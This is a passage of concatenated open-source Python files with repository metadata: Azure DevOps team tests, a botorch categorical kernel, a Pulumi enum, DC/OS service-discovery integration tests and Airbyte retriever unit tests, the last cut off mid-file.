get_teams(self._TOP_VALUE, self._SKIP_VALUE, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_get_teams.assert_called_once()
get_teams_param = self.mock_get_teams.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, get_teams_param['project_id'], str(get_teams_param))
self.assertEqual(10, get_teams_param['top'], str(get_teams_param))
self.assertEqual(2, get_teams_param['skip'], str(get_teams_param))
def test_get_team_members(self):
get_team_members(self._TEST_TEAM_NAME, self._TOP_VALUE, self._SKIP_VALUE, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_get_team_members.assert_called_once()
get_team_members_param = self.mock_get_team_members.call_args_list[0][1]
self.assertEqual(self._TEST_TEAM_NAME, get_team_members_param['team_id'], str(get_team_members_param))
self.assertEqual(self._TEST_PROJECT_NAME, get_team_members_param['project_id'], str(get_team_members_param))
self.assertEqual(10, get_team_members_param['top'], str(get_team_members_param))
self.assertEqual(2, get_team_members_param['skip'], str(get_team_members_param))
def test_update_team(self):
_NEW_TEAM_NAME = 'updated_team_name'
_NEW_TEAM_DESCRIPTION = 'update description'
update_team(self._TEST_TEAM_NAME, _NEW_TEAM_NAME, _NEW_TEAM_DESCRIPTION, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_update_team.assert_called_once()
update_team_param = self.mock_update_team.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, update_team_param['project_id'], str(update_team_param))
self.assertEqual(self._TEST_TEAM_NAME, update_team_param['team_id'], str(update_team_param))
self.assertEqual(_NEW_TEAM_NAME, update_team_param['team_data'].name, str(update_team_param))
self.assertEqual(_NEW_TEAM_DESCRIPTION, update_team_param['team_data'].description, str(update_team_param))
def test_update_team_with_no_name_and_description(self):
with self.assertRaises(Exception) as exc:
response = update_team(self._TEST_TEAM_NAME, None, None, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
self.assertEqual(str(exc.exception),r'Either name or description argument must be provided.')
#assert
self.mock_update_team.assert_not_called()
if __name__ == '__main__':
unittest.main()
|
458995e679a1513e2fd656e5fa8698b85695b871
|
c058f51b99f91faebf27183b2b579e9f96e0d8f5
|
/botorch/models/kernels/categorical.py
|
56f9258726a090bc01e5bf3868f6e209533802a6
|
[
"MIT"
] |
permissive
|
pytorch/botorch
|
255d62f698cc615c750e9343c278a63c7e96a586
|
4cc5ed59b2e8a9c780f786830c548e05cc74d53c
|
refs/heads/main
| 2023-08-22T15:23:51.071048
| 2023-08-22T05:30:38
| 2023-08-22T05:30:38
| 142,940,093
| 2,891
| 373
|
MIT
| 2023-09-13T00:16:13
| 2018-07-30T23:59:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,198
|
py
|
categorical.py
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
from gpytorch.kernels.kernel import Kernel
from torch import Tensor
class CategoricalKernel(Kernel):
r"""A Kernel for categorical features.
Computes `exp(-dist(x1, x2) / lengthscale)`, where
`dist(x1, x2)` is zero if `x1 == x2` and one if `x1 != x2`.
If the last dimension is not a batch dimension, then the
mean is considered.
Note: This kernel is NOT differentiable w.r.t. the inputs.
"""
has_lengthscale = True
def forward(
self,
x1: Tensor,
x2: Tensor,
diag: bool = False,
last_dim_is_batch: bool = False,
**kwargs,
) -> Tensor:
delta = x1.unsqueeze(-2) != x2.unsqueeze(-3)
dists = delta / self.lengthscale.unsqueeze(-2)
if last_dim_is_batch:
dists = dists.transpose(-3, -1)
else:
dists = dists.mean(-1)
res = torch.exp(-dists)
if diag:
res = torch.diagonal(res, dim1=-1, dim2=-2)
return res
|
73fd460008b3497c697eeba773cf473a9f8abcca
|
b049a961f100444dde14599bab06a0a4224d869b
|
/sdk/python/pulumi_azure_native/servicenetworking/_enums.py
|
12a206f094a218cb1f320963660b3f1e0cdb3044
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure-native
|
b390c88beef8381f9a71ab2bed5571e0dd848e65
|
4c499abe17ec6696ce28477dde1157372896364e
|
refs/heads/master
| 2023-08-30T08:19:41.564780
| 2023-08-28T19:29:04
| 2023-08-28T19:29:04
| 172,386,632
| 107
| 29
|
Apache-2.0
| 2023-09-14T13:17:00
| 2019-02-24T20:30:21
|
Python
|
UTF-8
|
Python
| false
| false
| 308
|
py
|
_enums.py
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'AssociationType',
]
class AssociationType(str, Enum):
"""
Association Type
"""
SUBNETS = "subnets"
|
1c21be18d7e078879df9ef1ab6dbaab6011d118a
|
9fcb5164ff77e8cf48d860485fed262d36ed63e7
|
/packages/dcos-integration-test/extra/test_service_discovery.py
|
565262111854b527b96aae9728e6647f7654d8e4
|
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-oracle-bcl-javase-javafx-2012",
"ErlPL-1.1",
"MPL-2.0",
"ISC",
"BSL-1.0",
"Python-2.0",
"BSD-2-Clause"
] |
permissive
|
dcos/dcos
|
2415d298979c6d6e3183aeb64c906a0959863576
|
79b9a39b4e639dc2c9435a869918399b50bfaf24
|
refs/heads/master
| 2023-08-09T04:16:19.696621
| 2021-07-05T06:42:39
| 2021-07-05T06:42:39
| 56,184,050
| 2,613
| 641
|
Apache-2.0
| 2023-07-27T04:13:50
| 2016-04-13T20:31:58
|
Python
|
UTF-8
|
Python
| false
| false
| 15,270
|
py
|
test_service_discovery.py
|
import collections
import logging
import socket
from typing import Any, Optional
import pytest
import requests
import retrying
import test_helpers
from dcos_test_utils import marathon
from dcos_test_utils.dcos_api import DcosApiSession
__maintainer__ = 'urbanserj'
__contact__ = 'dcos-networking@mesosphere.io'
DNS_ENTRY_UPDATE_TIMEOUT = 60 # in seconds
def _service_discovery_test(dcos_api_session: DcosApiSession, docker_network_bridge: bool) -> None:
"""Service discovery integration test
This test verifies if service discovery works, by comparing marathon data
with information from mesos-dns and from containers themselves.
This is achieved by deploying an application to marathon with two instances
, and ["hostname", "UNIQUE"] constraint set. This should result in containers
being deployed to two different slaves.
The application being deployed is a simple http server written in python.
Please check test_server.py for more details.
Next thing is comparing the service points provided by marathon with those
reported by mesos-dns. The tricky part here is that may take some time for
mesos-dns to catch up with changes in the dcos_api_session.
And finally, one of service points is verified in as-seen-by-other-containers
fashion.
+------------------------+ +------------------------+
| Slave 1 | | Slave 2 |
| | | |
| +--------------------+ | | +--------------------+ |
+--------------+ | | | | | | | |
| | | | App instance A +------>+ App instance B | |
| TC Agent +<---->+ | | | | | |
| | | | "test server" +<------+ "reflector" | |
+--------------+ | | | | | | | |
| +--------------------+ | | +--------------------+ |
+------------------------+ +------------------------+
Code running on TC agent connects to one of the containers (let's call it
"test server") and makes a POST request with IP and PORT service point of
the second container as parameters (let's call it "reflector"). The test
server in turn connects to other container and makes a "GET /reflect"
request. The reflector responds with test server's IP as seen by it and
the session UUID as provided to it by Marathon. This data is then returned
to TC agent in response to POST request issued earlier.
The test succeeds if test UUIDs of the test server, reflector and the test
itself match and the IP of the test server matches the service point of that
container as reported by Marathon.
"""
# TODO(cmaloney): For non docker network bridge we should just do a mesos container.
if docker_network_bridge:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
network=marathon.Network.BRIDGE,
container_port=2020,
host_port=9080)
else:
app_definition, test_uuid = test_helpers.marathon_test_app(container_type=marathon.Container.DOCKER)
app_definition['instances'] = 2
if len(dcos_api_session.slaves) < 2:
pytest.skip("Service Discovery Tests require a minimum of two agents.")
app_definition["constraints"] = [["hostname", "UNIQUE"], ]
with dcos_api_session.marathon.deploy_and_cleanup(app_definition):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
# Verify if Mesos-DNS agrees with Marathon:
@retrying.retry(wait_fixed=1000,
stop_max_delay=DNS_ENTRY_UPDATE_TIMEOUT * 1000,
retry_on_result=lambda ret: ret is None,
retry_on_exception=lambda x: False)
def _pool_for_mesos_dns() -> Optional[dict]:
r = dcos_api_session.get('/mesos_dns/v1/services/_{}._tcp.marathon.mesos'.format(
app_definition['id'].lstrip('/')))
assert r.status_code == 200
r_data = r.json() # type: dict
if r_data == [{'host': '', 'port': '', 'service': '', 'ip': ''}] or len(r_data) < len(service_points):
logging.info("Waiting for Mesos-DNS to update entries")
return None
else:
logging.info("Mesos-DNS entries have been updated!")
return r_data
try:
r_data = _pool_for_mesos_dns()
except retrying.RetryError:
msg = "Mesos DNS has failed to update entries in {} seconds."
pytest.fail(msg.format(DNS_ENTRY_UPDATE_TIMEOUT))
marathon_provided_servicepoints = sorted((x.host, x.port) for x in service_points)
mesosdns_provided_servicepoints = sorted((x['ip'], int(x['port'])) for x in r_data)
assert marathon_provided_servicepoints == mesosdns_provided_servicepoints
# Verify if containers themselves confirm what Marathon says:
payload = {"reflector_ip": service_points[1].host,
"reflector_port": service_points[1].port}
r = requests.post('http://{}:{}/your_ip'.format(
service_points[0].host, service_points[0].port), payload)
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{status_code} {reason}. "
msg += "Detailed explanation of the problem: {text}"
pytest.fail(msg.format(status_code=r.status_code, reason=r.reason, text=r.text))
r_data = r.json()
assert r_data['reflector_uuid'] == test_uuid
assert r_data['test_uuid'] == test_uuid
if len(dcos_api_session.slaves) >= 2:
# When len(slaves)==1, we are connecting through docker-proxy using
# docker0 interface ip. This makes this assertion useless, so we skip
# it and rely on matching test uuid between containers only.
assert r_data['my_ip'] == service_points[0].host
# There are several combinations of Service Discovery Options we have to try:
#
# Containerizers:
# -Mesos
# -Docker
#
# Network type:
# -Bridged
# -Host
# -Overlay
# -Overlay with Port Mapping
#
# Record type:
# -Container IP
# -Agent IP
# -Auto IP
#
# More info can be found here: https://dcos.io/docs/1.8/usage/service-discovery/dns-overview/
DNSHost = 0
DNSPortMap = 1
DNSOverlay = 2
DNSAddresses = collections.namedtuple("DNSAddresses", ["container", "agent", "auto"])
MarathonAddresses = collections.namedtuple("MarathonAddresses", ["host", "container"])
def get_ipv4_addresses(hostname: Any) -> frozenset:
res = socket.getaddrinfo(hostname, 0, family=socket.AF_INET, type=socket.SOCK_STREAM)
return frozenset([sockaddr[0] for (family, type, proto, canonname, sockaddr) in res])
def get_dns_addresses_by_app_name(app_name: str) -> DNSAddresses:
container_ip_name = '{}.marathon.containerip.dcos.thisdcos.directory'.format(app_name)
agent_ip_name = '{}.marathon.agentip.dcos.thisdcos.directory'.format(app_name)
auto_ip_name = '{}.marathon.autoip.dcos.thisdcos.directory'.format(app_name)
container_ips = get_ipv4_addresses(container_ip_name)
agent_ips = get_ipv4_addresses(agent_ip_name)
auto_ips = get_ipv4_addresses(auto_ip_name)
return DNSAddresses(container_ips, agent_ips, auto_ips)
def get_marathon_addresses_by_service_points(service_points: list) -> MarathonAddresses:
marathon_host_addrs = frozenset([point.host for point in service_points])
marathon_ip_addrs = frozenset([point.ip for point in service_points])
return MarathonAddresses(marathon_host_addrs, marathon_ip_addrs)
def get_dcos_dns_records() -> Optional[dict]:
response = requests.get('http://127.0.0.1:62080/v1/records')
if response.status_code != 200:
return None
data = response.json() # type: Optional[dict]
return data
def assert_service_discovery(dcos_api_session: DcosApiSession, app_definition: Any, net_types: list) -> None:
"""
net_types: List of network types: DNSHost, DNSPortMap, or DNSOverlay
"""
with dcos_api_session.marathon.deploy_and_cleanup(app_definition):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
marathon_addrs = get_marathon_addresses_by_service_points(service_points)
if DNSHost in net_types:
assert marathon_addrs.host == marathon_addrs.container
else:
assert not frozenset.intersection(marathon_addrs.host, marathon_addrs.container)
@retrying.retry(wait_fixed=1000,
stop_max_delay=DNS_ENTRY_UPDATE_TIMEOUT * 1000,
retry_on_exception=lambda x: True)
def _ensure_dns_converged() -> None:
app_name = app_definition['id']
try:
dns_addrs = get_dns_addresses_by_app_name(app_name)
except socket.gaierror as err:
records = get_dcos_dns_records()
logging.info("dcos-dns records: {}".format(records))
raise err
asserted = False
if len(net_types) == 2:
if (DNSOverlay in net_types) and (DNSPortMap in net_types):
assert marathon_addrs.host == dns_addrs.agent
assert marathon_addrs.host == dns_addrs.auto
assert marathon_addrs.container == dns_addrs.container
asserted = True
if len(net_types) == 1:
if DNSOverlay in net_types:
assert marathon_addrs.host == dns_addrs.agent
assert marathon_addrs.container == dns_addrs.auto
assert marathon_addrs.container == dns_addrs.container
asserted = True
if DNSPortMap in net_types:
assert marathon_addrs.host == dns_addrs.agent
assert marathon_addrs.host == dns_addrs.auto
assert marathon_addrs.container == dns_addrs.container
asserted = True
if DNSHost in net_types:
assert marathon_addrs.host == dns_addrs.agent
assert marathon_addrs.host == dns_addrs.auto
assert marathon_addrs.host == dns_addrs.container
asserted = True
if not asserted:
raise AssertionError("Not a valid dcos-net DNS combo")
_ensure_dns_converged()
def test_service_discovery_mesos_host(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.MESOS, healthcheck_protocol=marathon.Healthcheck.HTTP)
assert_service_discovery(dcos_api_session, app_definition, [DNSHost])
def test_service_discovery_mesos_overlay(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.MESOS,
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
network=marathon.Network.USER)
assert_service_discovery(dcos_api_session, app_definition, [DNSOverlay])
def test_service_discovery_docker_host(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
network=marathon.Network.HOST)
assert_service_discovery(dcos_api_session, app_definition, [DNSHost])
def test_service_discovery_docker_bridge(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
network=marathon.Network.BRIDGE,
container_port=2020,
host_port=9080)
assert_service_discovery(dcos_api_session, app_definition, [DNSPortMap])
def test_service_discovery_docker_overlay(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
network=marathon.Network.USER)
assert_service_discovery(dcos_api_session, app_definition, [DNSOverlay])
def test_service_discovery_docker_overlay_port_mapping(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
network=marathon.Network.USER,
host_port=9080)
assert_service_discovery(dcos_api_session, app_definition, [DNSOverlay, DNSPortMap])
def test_service_discovery_docker_bridged_network(dcos_api_session: DcosApiSession) -> None:
return _service_discovery_test(dcos_api_session, docker_network_bridge=True)
def test_service_discovery_docker_host_network(dcos_api_session: DcosApiSession) -> None:
return _service_discovery_test(dcos_api_session, docker_network_bridge=False)
def test_if_search_is_working(dcos_api_session: DcosApiSession) -> None:
"""Test if custom set search is working.
Verifies that a marathon app running on the dcos_api_session can resolve names using
searching the "search" the dcos_api_session was launched with (if any). It also tests
that absolute searches still work, and search + things that aren't
sub-domains fails properly.
The application being deployed is a simple http server written in python.
Please check test_server.py for more details.
"""
# Launch the app
app_definition, test_uuid = test_helpers.marathon_test_app()
with dcos_api_session.marathon.deploy_and_cleanup(app_definition):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
# Get the status
r = requests.get('http://{}:{}/dns_search'.format(service_points[0].host,
service_points[0].port))
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{0} {1}. "
msg += "Detailed explanation of the problem: {2}"
pytest.fail(msg.format(r.status_code, r.reason, r.text))
r_data = r.json()
# Make sure we hit the app we expected
assert r_data['test_uuid'] == test_uuid
expected_error = {'error': '[Errno -2] Name or service not known'}
# Check that result matches expectations for this dcos_api_session
expanded_config = test_helpers.get_expanded_config()
if expanded_config['dns_search']:
assert r_data['search_hit_leader'] in dcos_api_session.masters
assert r_data['always_hit_leader'] in dcos_api_session.masters
assert r_data['always_miss'] == expected_error
else: # No dns search, search hit should miss.
assert r_data['search_hit_leader'] == expected_error
assert r_data['always_hit_leader'] in dcos_api_session.masters
assert r_data['always_miss'] == expected_error
|
53e6b8d88f336b9ca8f6adcd6a9fd84b272be643
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/dts/airbyte/airbyte-cdk/python/unit_tests/sources/declarative/retrievers/test_simple_retriever.py
|
d4c69ffef9bb538c2ba8f1b54e9b1232e9ec25ec
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause",
"Elastic-2.0"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 25,114
|
py
|
test_simple_retriever.py
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from unittest.mock import MagicMock, patch
import airbyte_cdk.sources.declarative.requesters.error_handlers.response_status as response_status
import pytest
import requests
from airbyte_cdk.models import AirbyteLogMessage, AirbyteMessage, Level, SyncMode, Type
from airbyte_cdk.sources.declarative.exceptions import ReadException
from airbyte_cdk.sources.declarative.incremental import DatetimeBasedCursor
from airbyte_cdk.sources.declarative.requesters.error_handlers.response_action import ResponseAction
from airbyte_cdk.sources.declarative.requesters.error_handlers.response_status import ResponseStatus
from airbyte_cdk.sources.declarative.requesters.request_option import RequestOptionType
from airbyte_cdk.sources.declarative.requesters.requester import HttpMethod
from airbyte_cdk.sources.declarative.retrievers.simple_retriever import (
SimpleRetriever,
SimpleRetrieverTestReadDecorator,
_prepared_request_to_airbyte_message,
_response_to_airbyte_message,
)
from airbyte_cdk.sources.streams.http.auth import NoAuth
from airbyte_cdk.sources.streams.http.http import HttpStream
primary_key = "pk"
records = [{"id": 1}, {"id": 2}]
request_response_logs = [
AirbyteLogMessage(level=Level.INFO, message="request:{}"),
AirbyteLogMessage(level=Level.INFO, message="response{}"),
]
config = {}
@patch.object(HttpStream, "_read_pages", return_value=[])
def test_simple_retriever_full(mock_http_stream):
requester = MagicMock()
request_params = {"param": "value"}
requester.get_request_params.return_value = request_params
paginator = MagicMock()
next_page_token = {"cursor": "cursor_value"}
paginator.path.return_value = None
paginator.next_page_token.return_value = next_page_token
record_selector = MagicMock()
record_selector.select_records.return_value = records
stream_slicer = MagicMock()
stream_slices = [{"date": "2022-01-01"}, {"date": "2022-01-02"}]
stream_slicer.stream_slices.return_value = stream_slices
response = requests.Response()
underlying_state = {"date": "2021-01-01"}
stream_slicer.get_stream_state.return_value = underlying_state
requester.get_authenticator.return_value = NoAuth()
url_base = "https://airbyte.io"
requester.get_url_base.return_value = url_base
path = "/v1"
requester.get_path.return_value = path
http_method = HttpMethod.GET
requester.get_method.return_value = http_method
backoff_time = 60
should_retry = ResponseStatus.retry(backoff_time)
requester.interpret_response_status.return_value = should_retry
request_body_json = {"body": "json"}
requester.request_body_json.return_value = request_body_json
request_body_data = {"body": "data"}
requester.get_request_body_data.return_value = request_body_data
request_body_json = {"body": "json"}
requester.get_request_body_json.return_value = request_body_json
request_kwargs = {"kwarg": "value"}
requester.request_kwargs.return_value = request_kwargs
cache_filename = "cache"
requester.cache_filename = cache_filename
use_cache = True
requester.use_cache = use_cache
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
paginator=paginator,
record_selector=record_selector,
stream_slicer=stream_slicer,
parameters={},
config={},
)
assert retriever.primary_key == primary_key
assert retriever.url_base == url_base
assert retriever.path() == path
assert retriever.state == underlying_state
assert retriever.next_page_token(response) == next_page_token
assert retriever.request_params(None, None, None) == request_params
assert retriever.stream_slices(sync_mode=SyncMode.incremental) == stream_slices
assert retriever._last_response is None
assert retriever._last_records is None
assert retriever.parse_response(response, stream_state={}) == records
assert retriever._last_response == response
assert retriever._last_records == records
assert retriever.http_method == "GET"
assert not retriever.raise_on_http_errors
assert retriever.should_retry(requests.Response())
assert retriever.backoff_time(requests.Response()) == backoff_time
assert retriever.request_body_json(None, None, None) == request_body_json
assert retriever.request_kwargs(None, None, None) == request_kwargs
assert retriever.cache_filename == cache_filename
assert retriever.use_cache == use_cache
[r for r in retriever.read_records(SyncMode.full_refresh)]
paginator.reset.assert_called()
@patch.object(HttpStream, "_read_pages", return_value=[*request_response_logs, *records])
def test_simple_retriever_with_request_response_logs(mock_http_stream):
requester = MagicMock()
paginator = MagicMock()
record_selector = MagicMock()
stream_slicer = DatetimeBasedCursor(
start_datetime="",
end_datetime="",
step="P1D",
cursor_field="id",
datetime_format="",
cursor_granularity="P1D",
config={},
parameters={},
)
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
paginator=paginator,
record_selector=record_selector,
stream_slicer=stream_slicer,
parameters={},
config={},
)
actual_messages = [r for r in retriever.read_records(SyncMode.full_refresh)]
paginator.reset.assert_called()
assert isinstance(actual_messages[0], AirbyteLogMessage)
assert isinstance(actual_messages[1], AirbyteLogMessage)
assert actual_messages[2] == records[0]
assert actual_messages[3] == records[1]
@patch.object(HttpStream, "_read_pages", return_value=[])
def test_simple_retriever_with_request_response_log_last_records(mock_http_stream):
requester = MagicMock()
paginator = MagicMock()
record_selector = MagicMock()
record_selector.select_records.return_value = request_response_logs
response = requests.Response()
stream_slicer = DatetimeBasedCursor(
start_datetime="",
end_datetime="",
step="P1D",
cursor_field="id",
datetime_format="",
cursor_granularity="P1D",
config={},
parameters={},
)
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
paginator=paginator,
record_selector=record_selector,
stream_slicer=stream_slicer,
parameters={},
config={},
)
assert retriever._last_response is None
assert retriever._last_records is None
assert retriever.parse_response(response, stream_state={}) == request_response_logs
assert retriever._last_response == response
assert retriever._last_records == request_response_logs
[r for r in retriever.read_records(SyncMode.full_refresh)]
paginator.reset.assert_called()
@pytest.mark.parametrize(
"test_name, requester_response, expected_should_retry, expected_backoff_time",
[
("test_should_retry_fail", response_status.FAIL, False, None),
("test_should_retry_none_backoff", ResponseStatus.retry(None), True, None),
("test_should_retry_custom_backoff", ResponseStatus.retry(60), True, 60),
],
)
def test_should_retry(test_name, requester_response, expected_should_retry, expected_backoff_time):
requester = MagicMock(use_cache=False)
retriever = SimpleRetriever(
name="stream_name", primary_key=primary_key, requester=requester, record_selector=MagicMock(), parameters={}, config={}
)
requester.interpret_response_status.return_value = requester_response
assert retriever.should_retry(requests.Response()) == expected_should_retry
if requester_response.action == ResponseAction.RETRY:
assert retriever.backoff_time(requests.Response()) == expected_backoff_time
@pytest.mark.parametrize(
"test_name, status_code, response_status, len_expected_records, expected_error",
[
(
"test_parse_response_fails_if_should_retry_is_fail",
404,
response_status.FAIL,
None,
ReadException("Request None failed with response <Response [404]>"),
),
("test_parse_response_succeeds_if_should_retry_is_ok", 200, response_status.SUCCESS, 1, None),
("test_parse_response_succeeds_if_should_retry_is_ignore", 404, response_status.IGNORE, 0, None),
(
"test_parse_response_fails_with_custom_error_message",
404,
ResponseStatus(response_action=ResponseAction.FAIL, error_message="Custom error message override"),
None,
ReadException("Custom error message override"),
),
],
)
def test_parse_response(test_name, status_code, response_status, len_expected_records, expected_error):
requester = MagicMock(use_cache=False)
record_selector = MagicMock()
record_selector.select_records.return_value = [{"id": 100}]
retriever = SimpleRetriever(
name="stream_name", primary_key=primary_key, requester=requester, record_selector=record_selector, parameters={}, config={}
)
response = requests.Response()
response.request = requests.Request()
response.status_code = status_code
requester.interpret_response_status.return_value = response_status
if len_expected_records is None:
try:
retriever.parse_response(response, stream_state={})
assert False
except ReadException as actual_exception:
assert type(expected_error) is type(actual_exception)
else:
records = retriever.parse_response(response, stream_state={})
assert len(records) == len_expected_records
@pytest.mark.parametrize(
"test_name, response_action, retry_in, expected_backoff_time",
[
("test_backoff_retriable_request", ResponseAction.RETRY, 10, 10),
("test_backoff_fail_request", ResponseAction.FAIL, 10, None),
("test_backoff_ignore_request", ResponseAction.IGNORE, 10, None),
("test_backoff_success_request", ResponseAction.IGNORE, 10, None),
],
)
def test_backoff_time(test_name, response_action, retry_in, expected_backoff_time):
requester = MagicMock(use_cache=False)
record_selector = MagicMock()
record_selector.select_records.return_value = [{"id": 100}]
response = requests.Response()
retriever = SimpleRetriever(
name="stream_name", primary_key=primary_key, requester=requester, record_selector=record_selector, parameters={}, config={}
)
if expected_backoff_time:
requester.interpret_response_status.return_value = ResponseStatus(response_action, retry_in)
actual_backoff_time = retriever.backoff_time(response)
assert expected_backoff_time == actual_backoff_time
else:
try:
retriever.backoff_time(response)
assert False
except ValueError:
pass
@pytest.mark.parametrize(
"test_name, paginator_mapping, stream_slicer_mapping, expected_mapping",
[
("test_only_base_headers", {}, {}, {"key": "value"}),
("test_header_from_pagination", {"offset": 1000}, {}, {"key": "value", "offset": 1000}),
("test_header_from_stream_slicer", {}, {"slice": "slice_value"}, {"key": "value", "slice": "slice_value"}),
("test_duplicate_header_slicer", {}, {"key": "slice_value"}, None),
("test_duplicate_header_slicer_paginator", {"k": "v"}, {"k": "slice_value"}, None),
("test_duplicate_header_paginator", {"key": 1000}, {}, None),
],
)
def test_get_request_options_from_pagination(test_name, paginator_mapping, stream_slicer_mapping, expected_mapping):
# This test does not test request headers because they must be strings
paginator = MagicMock()
paginator.get_request_params.return_value = paginator_mapping
paginator.get_request_body_data.return_value = paginator_mapping
paginator.get_request_body_json.return_value = paginator_mapping
stream_slicer = MagicMock()
stream_slicer.get_request_params.return_value = stream_slicer_mapping
stream_slicer.get_request_body_data.return_value = stream_slicer_mapping
stream_slicer.get_request_body_json.return_value = stream_slicer_mapping
base_mapping = {"key": "value"}
requester = MagicMock(use_cache=False)
requester.get_request_params.return_value = base_mapping
requester.get_request_body_data.return_value = base_mapping
requester.get_request_body_json.return_value = base_mapping
record_selector = MagicMock()
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
record_selector=record_selector,
paginator=paginator,
stream_slicer=stream_slicer,
parameters={},
config={},
)
request_option_type_to_method = {
RequestOptionType.request_parameter: retriever.request_params,
RequestOptionType.body_data: retriever.request_body_data,
RequestOptionType.body_json: retriever.request_body_json,
}
for _, method in request_option_type_to_method.items():
if expected_mapping:
actual_mapping = method(None, None, None)
assert expected_mapping == actual_mapping
else:
try:
method(None, None, None)
assert False
except ValueError:
pass
@pytest.mark.parametrize(
"test_name, paginator_mapping, expected_mapping",
[
("test_only_base_headers", {}, {"key": "value"}),
("test_header_from_pagination", {"offset": 1000}, {"key": "value", "offset": "1000"}),
("test_duplicate_header", {"key": 1000}, None),
],
)
def test_get_request_headers(test_name, paginator_mapping, expected_mapping):
# This test is separate from the other request options because request headers must be strings
paginator = MagicMock()
paginator.get_request_headers.return_value = paginator_mapping
requester = MagicMock(use_cache=False)
base_mapping = {"key": "value"}
requester.get_request_headers.return_value = base_mapping
record_selector = MagicMock()
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
record_selector=record_selector,
paginator=paginator,
parameters={},
config={},
)
request_option_type_to_method = {
RequestOptionType.header: retriever.request_headers,
}
for _, method in request_option_type_to_method.items():
if expected_mapping:
actual_mapping = method(None, None, None)
assert expected_mapping == actual_mapping
else:
try:
method(None, None, None)
assert False
except ValueError:
pass
@pytest.mark.parametrize(
"test_name, requester_body_data, paginator_body_data, expected_body_data",
[
("test_only_requester_mapping", {"key": "value"}, {}, {"key": "value"}),
("test_only_requester_string", "key=value", {}, "key=value"),
("test_requester_mapping_and_paginator_no_duplicate", {"key": "value"}, {"offset": 1000}, {"key": "value", "offset": 1000}),
("test_requester_mapping_and_paginator_with_duplicate", {"key": "value"}, {"key": 1000}, None),
("test_requester_string_and_paginator", "key=value", {"offset": 1000}, None),
],
)
def test_request_body_data(test_name, requester_body_data, paginator_body_data, expected_body_data):
paginator = MagicMock()
paginator.get_request_body_data.return_value = paginator_body_data
requester = MagicMock(use_cache=False)
requester.get_request_body_data.return_value = requester_body_data
record_selector = MagicMock()
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
record_selector=record_selector,
paginator=paginator,
parameters={},
config={},
)
if expected_body_data:
actual_body_data = retriever.request_body_data(None, None, None)
assert expected_body_data == actual_body_data
else:
try:
retriever.request_body_data(None, None, None)
assert False
except ValueError:
pass
@pytest.mark.parametrize(
"test_name, requester_path, paginator_path, expected_path",
[
("test_path_from_requester", "/v1/path", None, "/v1/path"),
("test_path_from_paginator", "/v1/path/", "/v2/paginator", "/v2/paginator"),
],
)
def test_path(test_name, requester_path, paginator_path, expected_path):
paginator = MagicMock()
paginator.path.return_value = paginator_path
requester = MagicMock(use_cache=False)
requester.get_path.return_value = requester_path
record_selector = MagicMock()
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
record_selector=record_selector,
paginator=paginator,
parameters={},
config={},
)
actual_path = retriever.path(stream_state=None, stream_slice=None, next_page_token=None)
assert expected_path == actual_path
@pytest.mark.parametrize(
"test_name, http_method, url, headers, params, body_json, body_data, expected_airbyte_message",
[
(
"test_basic_get_request",
HttpMethod.GET,
"https://airbyte.io",
{},
{},
{},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
